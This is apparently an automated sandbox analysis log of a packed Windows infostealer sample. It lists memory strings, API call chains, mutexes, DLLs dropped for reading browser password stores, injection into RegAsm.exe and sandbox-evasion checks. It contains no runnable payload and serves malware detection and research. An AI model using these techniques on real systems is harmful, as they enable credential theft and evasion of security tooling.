                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: 576ZVk4VCTte.2.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: 576ZVk4VCTte.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/dotnet/runtime
                    Source: 576ZVk4VCTte.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://mozilla.org0
                    Source: 576ZVk4VCTte.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                    Source: freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: 576ZVk4VCTte.2.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                    Source: U24ul5K3kmRD.2.dr, ScG62f2W5WaB.2.dr, h9pwT70RxGaI.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C15A OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetDC,GetDC,LocalAlloc,CreateCompatibleDC,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,CreateCompatibleBitmap,SelectObject,BitBlt,GetObjectW,LocalAlloc,GetLastError,LocalFree,OutputDebugStringA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,LocalAlloc,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,ReleaseDC,ReleaseDC,LocalFree,2_2_0040C15A
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E13280 NtFlushProcessWriteBuffers,0_2_00007FF708E13280
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E217F2 NtFlushProcessWriteBuffers,0_2_00007FF708E217F2
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E417D00_2_00007FF708E417D0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E309840_2_00007FF708E30984
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E44AE00_2_00007FF708E44AE0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E18CE00_2_00007FF708E18CE0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E28C200_2_00007FF708E28C20
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E42EF00_2_00007FF708E42EF0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E18E840_2_00007FF708E18E84
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E20F500_2_00007FF708E20F50
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E30F300_2_00007FF708E30F30
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708EE80200_2_00007FF708EE8020
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E232500_2_00007FF708E23250
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E372300_2_00007FF708E37230
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E374100_2_00007FF708E37410
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E1B3700_2_00007FF708E1B370
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E224F80_2_00007FF708E224F8
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E174A00_2_00007FF708E174A0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E2F4800_2_00007FF708E2F480
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708EDC5C00_2_00007FF708EDC5C0
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E275700_2_00007FF708E27570
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404B502_2_00404B50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409ADC2_2_00409ADC
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: String function: 00007FF708E1CC80 appears 63 times
                    Source: sqlite3.dll.2.drStatic PE information: Number of sections : 18 > 10
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMahmoud.dll0 vs 60lAWJYfsL.exe
                    Source: 60lAWJYfsL.exe, 00000000.00000000.1631077348.00007FF7090ED000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMahmoud.dll0 vs 60lAWJYfsL.exe
                    Source: 60lAWJYfsL.exeBinary or memory string: OriginalFilenameMahmoud.dll0 vs 60lAWJYfsL.exe
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/20@0/1
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF708E22330 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF708E22330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC1E CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,SetEnvironmentVariableA,CloseHandle,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,SetEnvironmentVariableA,GetLastError,CancelWaitableTimer,GetLastError,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,Process32FirstW,lstrcmpiW,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,LocalAlloc,OutputDebugStringA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,GetLastError,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,CreateMutexA,ReleaseMutex,GetLastError,SetEnvironmentVariableA,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,Process32FirstW,CloseHandle,2_2_0040FC1E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXs7yc2cpf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXdhtqvkw3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXxjk5ahv4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX39bzbsag
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXdjgl1lda
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXid6eg7kl
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX2vorh5pk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX4z00y3dg
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX5u8ptwy0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXdxglk35i
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXtn7gp4y9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXq1n7w3bt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX9of20kmn
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXphqqzlgp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXawf1ae1n
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXpzc2har6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXs0ri916b
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXuwyp0mzf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXa8cu8u0k
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXz3u02dvk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXfk5pbuec
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\stasvasbas
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX659bq5ml
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXjac2h9rp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXukdk5rol
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXmqv692pu
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXy9bs4nx7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXqamhcxjd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXbuj0t1o5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX1foxa753
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXapeqgoy0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX34yeuucm
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXq1fl7liz
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX34s52bf3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX3t1mxx1o
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXwtb7gfab
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTX7li8kyt9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXj7l6ka3u
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXqtzx8hp7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXeuk0bqyk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\MTXrulvz4cj
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: sqlite3.dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %s
                    Source: sqlite3.dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: sqlite3.dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: sqlite3.dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: sqlite3.dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: sqlite3.dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: sqlite3.dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: RegAsm.exe, 00000002.00000002.2889674185.000000000130A000.00000004.00000020.00020000.00000000.sdmp, BZh1Z2j0t6WU.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: sqlite3.dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: sqlite3.dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: 60lAWJYfsL.exeVirustotal: Detection: 8%
                    Source: unknownProcess created: C:\Users\user\Desktop\60lAWJYfsL.exe "C:\Users\user\Desktop\60lAWJYfsL.exe"
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: 60lAWJYfsL.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: 60lAWJYfsL.exeStatic file information: File size 1073152 > 1048576
                    Source: 60lAWJYfsL.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x105200
                    Source: 60lAWJYfsL.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr
                    Source: Binary string: C:\Users\Adminus\source\repos\Mahmoud\Mahmoud\bin\Release\net8.0\win-x64\native\Mahmoud.pdbyy: source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: softokn3.pdbp source: softokn3.dll.2.dr
                    Source: Binary string: mozglue.pdb@+ source: mozglue.dll.2.dr
                    Source: Binary string: C:\Users\Adminus\source\repos\Mahmoud\Mahmoud\bin\Release\net8.0\win-x64\native\Mahmoud.pdb source: 60lAWJYfsL.exe, 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: nss3.pdb source: nss3.dll.2.dr
                    Source: Binary string: mozglue.pdb source: mozglue.dll.2.dr
                    Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
                    Source: Binary string: softokn3.pdb source: softokn3.dll.2.dr
                    Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeCode function: 0_2_00007FF7090EBCE0 LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00007FF7090EBCE0
                    Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                    Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                    Source: sqlite3.dll.2.drStatic PE information: section name: /4
                    Source: sqlite3.dll.2.drStatic PE information: section name: /19
                    Source: sqlite3.dll.2.drStatic PE information: section name: /31
                    Source: sqlite3.dll.2.drStatic PE information: section name: /45
                    Source: sqlite3.dll.2.drStatic PE information: section name: /57
                    Source: sqlite3.dll.2.drStatic PE information: section name: /70
                    Source: sqlite3.dll.2.drStatic PE information: section name: /81
                    Source: sqlite3.dll.2.drStatic PE information: section name: /92
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C15A OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetDC,GetDC,LocalAlloc,CreateCompatibleDC,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,CreateCompatibleBitmap,SelectObject,BitBlt,GetObjectW,LocalAlloc,GetLastError,LocalFree,OutputDebugStringA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,LocalAlloc,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,ReleaseDC,ReleaseDC,LocalFree,2_2_0040C15A

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_2-4100
                    Tries to delay execution (extensive OutputDebugStringW loop)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: OutputDebugStringW count: 1937
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1679410416.0000027E39403000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLHH
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1679325818.0000027E3523C000.00000004.00000020.00020000.00000000.sdmp, 60lAWJYfsL.exe, 00000000.00000002.1679410416.0000027E39403000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1679410416.0000027E39403000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0"
                    Source: 60lAWJYfsL.exe, 00000000.00000002.1679325818.0000027E3523C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL#D
